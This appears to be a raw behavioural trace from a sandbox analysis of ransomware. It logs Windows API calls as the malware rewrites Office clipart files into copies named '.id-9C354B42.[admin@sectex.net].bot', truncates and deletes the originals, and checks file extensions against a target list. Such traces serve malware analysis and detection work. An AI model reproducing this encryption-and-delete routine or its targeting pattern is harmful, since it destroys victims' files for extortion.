	[0140.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0140.240] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.240] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0140.240] GetLastError () returned 0x0
	[0140.240] ReadFile (in: hFile=0x398, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x687c, lpOverlapped=0x0) returned 1
	[0140.243] WriteFile (in: hFile=0x3b0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x6880, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x6880, lpOverlapped=0x0) returned 1
	[0140.244] ReadFile (in: hFile=0x398, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.244] WriteFile (in: hFile=0x3b0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.244] SetEndOfFile (hFile=0x3b0) returned 1
	[0140.303] CloseHandle (hObject=0x3b0) returned 1
	[0140.304] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.304] SetEndOfFile (hFile=0x398) returned 1
	[0140.315] CloseHandle (hObject=0x398) returned 1
	[0140.315] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.366] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf")) returned 1
	[0140.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63
	[0140.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63
	[0140.431] lstrlenW (lpString=".doc") returned 4
	[0140.431] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.431] lstrlenW (lpString=".docx") returned 5
	[0140.431] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.431] lstrlenW (lpString=".pdf") returned 4
	[0140.431] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.431] lstrlenW (lpString=".xls") returned 4
	[0140.431] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.431] lstrlenW (lpString=".xlsx") returned 5
	[0140.431] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.431] lstrlenW (lpString=".ppt") returned 4
	[0140.431] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63
	[0140.431] lstrlenW (lpString=".zip") returned 4
	[0140.431] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.431] lstrlenW (lpString=".rar") returned 4
	[0140.431] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.431] lstrlenW (lpString=".bz2") returned 4
	[0140.431] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.431] lstrlenW (lpString=".7z") returned 3
	[0140.431] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63
	[0140.431] lstrlenW (lpString=".dbf") returned 4
	[0140.432] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63
	[0140.432] lstrlenW (lpString=".1cd") returned 4
	[0140.432] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63
	[0140.432] lstrlenW (lpString=".jpg") returned 4
	[0140.432] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63
	[0140.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63
	[0140.432] lstrlenW (lpString=".doc") returned 4
	[0140.432] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.432] lstrlenW (lpString=".docx") returned 5
	[0140.432] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.432] lstrlenW (lpString=".pdf") returned 4
	[0140.432] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.432] lstrlenW (lpString=".xls") returned 4
	[0140.432] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.432] lstrlenW (lpString=".xlsx") returned 5
	[0140.432] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.432] lstrlenW (lpString=".ppt") returned 4
	[0140.432] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63
	[0140.432] lstrlenW (lpString=".zip") returned 4
	[0140.432] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.432] lstrlenW (lpString=".rar") returned 4
	[0140.432] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.432] lstrlenW (lpString=".bz2") returned 4
	[0140.432] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.432] lstrlenW (lpString=".7z") returned 3
	[0140.432] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63
	[0140.432] lstrlenW (lpString=".dbf") returned 4
	[0140.432] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63
	[0140.432] lstrlenW (lpString=".1cd") returned 4
	[0140.433] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63
	[0140.433] lstrlenW (lpString=".jpg") returned 4
	[0140.433] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.433] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0140.433] lstrlenW (lpString="BD07831_.WMF") returned 12
	[0140.433] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0140.495] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=4066) returned 1
	[0140.495] CloseHandle (hObject=0x3a4) returned 1
	[0140.496] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf")) returned 0x20
	[0140.515] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.515] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.515] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0140.524] GetLastError () returned 0x0
	[0140.524] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xfe2, lpOverlapped=0x0) returned 1
	[0140.525] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xff0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xff0, lpOverlapped=0x0) returned 1
	[0140.526] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.526] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.527] SetEndOfFile (hFile=0x384) returned 1
	[0140.527] CloseHandle (hObject=0x384) returned 1
	[0140.527] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.527] SetEndOfFile (hFile=0x31c) returned 1
	[0140.530] CloseHandle (hObject=0x31c) returned 1
	[0140.530] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.530] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf")) returned 1
	[0140.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63
	[0140.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63
	[0140.530] lstrlenW (lpString=".doc") returned 4
	[0140.530] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.530] lstrlenW (lpString=".docx") returned 5
	[0140.531] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.531] lstrlenW (lpString=".pdf") returned 4
	[0140.531] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.531] lstrlenW (lpString=".xls") returned 4
	[0140.531] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.531] lstrlenW (lpString=".xlsx") returned 5
	[0140.531] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.531] lstrlenW (lpString=".ppt") returned 4
	[0140.531] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63
	[0140.531] lstrlenW (lpString=".zip") returned 4
	[0140.531] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.531] lstrlenW (lpString=".rar") returned 4
	[0140.531] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.531] lstrlenW (lpString=".bz2") returned 4
	[0140.531] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.531] lstrlenW (lpString=".7z") returned 3
	[0140.531] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63
	[0140.531] lstrlenW (lpString=".dbf") returned 4
	[0140.531] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63
	[0140.531] lstrlenW (lpString=".1cd") returned 4
	[0140.531] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63
	[0140.531] lstrlenW (lpString=".jpg") returned 4
	[0140.531] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63
	[0140.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63
	[0140.531] lstrlenW (lpString=".doc") returned 4
	[0140.531] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.531] lstrlenW (lpString=".docx") returned 5
	[0140.531] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.531] lstrlenW (lpString=".pdf") returned 4
	[0140.532] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.532] lstrlenW (lpString=".xls") returned 4
	[0140.532] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.532] lstrlenW (lpString=".xlsx") returned 5
	[0140.532] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.532] lstrlenW (lpString=".ppt") returned 4
	[0140.532] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63
	[0140.532] lstrlenW (lpString=".zip") returned 4
	[0140.532] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.532] lstrlenW (lpString=".rar") returned 4
	[0140.532] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.532] lstrlenW (lpString=".bz2") returned 4
	[0140.532] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.532] lstrlenW (lpString=".7z") returned 3
	[0140.532] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63
	[0140.532] lstrlenW (lpString=".dbf") returned 4
	[0140.532] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63
	[0140.532] lstrlenW (lpString=".1cd") returned 4
	[0140.532] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63
	[0140.532] lstrlenW (lpString=".jpg") returned 4
	[0140.532] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.533] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0140.533] lstrlenW (lpString="BD09194_.WMF") returned 12
	[0140.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.534] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=14540) returned 1
	[0140.534] CloseHandle (hObject=0x31c) returned 1
	[0140.534] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf")) returned 0x20
	[0140.534] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.534] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.534] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.535] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0140.535] GetLastError () returned 0x0
	[0140.535] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x38cc, lpOverlapped=0x0) returned 1
	[0140.537] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x38d0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x38d0, lpOverlapped=0x0) returned 1
	[0140.538] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.538] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.538] SetEndOfFile (hFile=0x384) returned 1
	[0140.538] CloseHandle (hObject=0x384) returned 1
	[0140.538] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.538] SetEndOfFile (hFile=0x31c) returned 1
	[0140.540] CloseHandle (hObject=0x31c) returned 1
	[0140.541] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.541] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf")) returned 1
	[0140.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63
	[0140.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63
	[0140.541] lstrlenW (lpString=".doc") returned 4
	[0140.541] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.541] lstrlenW (lpString=".docx") returned 5
	[0140.541] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.542] lstrlenW (lpString=".pdf") returned 4
	[0140.542] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.542] lstrlenW (lpString=".xls") returned 4
	[0140.542] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.542] lstrlenW (lpString=".xlsx") returned 5
	[0140.542] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.542] lstrlenW (lpString=".ppt") returned 4
	[0140.542] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63
	[0140.542] lstrlenW (lpString=".zip") returned 4
	[0140.542] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.542] lstrlenW (lpString=".rar") returned 4
	[0140.542] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.542] lstrlenW (lpString=".bz2") returned 4
	[0140.542] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.542] lstrlenW (lpString=".7z") returned 3
	[0140.542] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63
	[0140.542] lstrlenW (lpString=".dbf") returned 4
	[0140.542] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63
	[0140.542] lstrlenW (lpString=".1cd") returned 4
	[0140.542] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63
	[0140.542] lstrlenW (lpString=".jpg") returned 4
	[0140.542] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63
	[0140.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63
	[0140.542] lstrlenW (lpString=".doc") returned 4
	[0140.542] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.542] lstrlenW (lpString=".docx") returned 5
	[0140.542] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.542] lstrlenW (lpString=".pdf") returned 4
	[0140.543] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.543] lstrlenW (lpString=".xls") returned 4
	[0140.543] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.543] lstrlenW (lpString=".xlsx") returned 5
	[0140.543] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.543] lstrlenW (lpString=".ppt") returned 4
	[0140.543] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63
	[0140.543] lstrlenW (lpString=".zip") returned 4
	[0140.543] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.543] lstrlenW (lpString=".rar") returned 4
	[0140.543] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.543] lstrlenW (lpString=".bz2") returned 4
	[0140.543] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.543] lstrlenW (lpString=".7z") returned 3
	[0140.543] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63
	[0140.543] lstrlenW (lpString=".dbf") returned 4
	[0140.543] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63
	[0140.543] lstrlenW (lpString=".1cd") returned 4
	[0140.543] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63
	[0140.543] lstrlenW (lpString=".jpg") returned 4
	[0140.543] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.543] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0140.543] lstrlenW (lpString="BD09662_.WMF") returned 12
	[0140.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.544] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=20554) returned 1
	[0140.544] CloseHandle (hObject=0x31c) returned 1
	[0140.544] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf")) returned 0x20
	[0140.544] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
